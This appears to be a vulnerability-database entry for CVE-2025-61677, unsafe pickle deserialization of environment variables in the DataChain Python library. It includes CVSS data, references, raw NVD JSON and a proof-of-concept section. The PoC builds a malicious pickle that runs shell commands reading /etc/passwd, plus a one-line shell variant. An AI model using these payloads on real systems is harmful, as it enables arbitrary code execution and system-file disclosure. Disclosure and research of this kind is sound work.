CVE-2025-61677

Description

DataChain is a Python-based AI-data warehouse for transforming and analyzing unstructured data. Versions 0.34.1 and below allow for deseriaization of untrusted data because of the way the DataChain library reads serialized objects from environment variables (such as DATACHAIN__METASTORE and DATACHAIN__WAREHOUSE) in the loader.py module. An attacker with the ability to set these environment variables can trigger code execution when the application loads. This issue is fixed in version 0.34.2.

CVSS Details

CVSS Score

2.5

Severity

LOW

CVSS Vector

CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

iterative/datachain <= 0.34.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-61677 PoC - DataChain Unsafe Deserialization via Environment Variables
# This PoC demonstrates how an attacker can exploit the unsafe deserialization
# vulnerability in DataChain <= 0.34.1 by setting malicious environment variables.

import os
import pickle
import base64

class ExploitPayload:
    """Malicious pickle payload that executes arbitrary code upon deserialization."""
    def __reduce__(self):
        # Command to execute when the payload is deserialized
        cmd = "id; whoami; cat /etc/passwd | head -5"
        return (os.system, (cmd,))

def generate_payload():
    """Generate a base64-encoded malicious pickle payload."""
    payload = pickle.dumps(ExploitPayload())
    encoded = base64.b64encode(payload).decode()
    return encoded

def exploit():
    """
    Step 1: Generate the malicious serialized payload.
    Step 2: Set it as the DATACHAIN__METASTORE environment variable.
    Step 3: Trigger DataChain to read the environment variable, causing code execution.
    """
    payload = generate_payload()
    print(f"[*] Generated payload: {payload[:50]}...")

    # Set the malicious environment variable
    os.environ["DATACHAIN__METASTORE"] = payload
    os.environ["DATACHAIN__WAREHOUSE"] = payload

    print("[*] Environment variables set with malicious payload")
    print("[*] Triggering DataChain import to execute the payload...")

    # When DataChain is imported or initialized, it will read the environment
    # variables and deserialize the malicious payload, triggering code execution
    try:
        from datachain.config import load_config
        config = load_config()
    except Exception as e:
        print(f"[*] Exploit triggered (expected behavior): {e}")

if __name__ == "__main__":
    exploit()

# Alternative exploitation method (direct shell command):
# export DATACHAIN__METASTORE="$(python3 -c 'import pickle,base64,os; \
#   class P: __reduce__ = lambda s: (os.system, ("touch /tmp/pwned",)); \
#   print(base64.b64encode(pickle.dumps(P())).decode())')"
# python3 -c "import datachain"

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-61677
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-61677
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-61677/
[4] VulDB https://vuldb.com/cve/CVE-2025-61677
[5] https://github.com/iterative/datachain/commit/914b95610620d50c8d9bee506ccbfa7d4d57fdc0
[6] https://github.com/iterative/datachain/pull/1358
[7] https://github.com/iterative/datachain/security/advisories/GHSA-6px8-mr29-cj4r

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-61677", "sourceIdentifier": "[email protected]", "published": "2025-10-03T22:15:32.390", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "DataChain is a Python-based AI-data warehouse for transforming and analyzing unstructured data. Versions 0.34.1 and below allow for deseriaization of untrusted data because of the way the DataChain library reads serialized objects from environment variables (such as DATACHAIN__METASTORE and DATACHAIN__WAREHOUSE) in the loader.py module. An attacker with the ability to set these environment variables can trigger code execution when the application loads. This issue is fixed in version 0.34.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 2.5, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.0, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://github.com/iterative/datachain/commit/914b95610620d50c8d9bee506ccbfa7d4d57fdc0", "source": "[email protected]"}, {"url": "https://github.com/iterative/datachain/pull/1358", "source": "[email protected]"}, {"url": "https://github.com/iterative/datachain/security/advisories/GHSA-6px8-mr29-cj4r", "source": "[email protected]"}]}}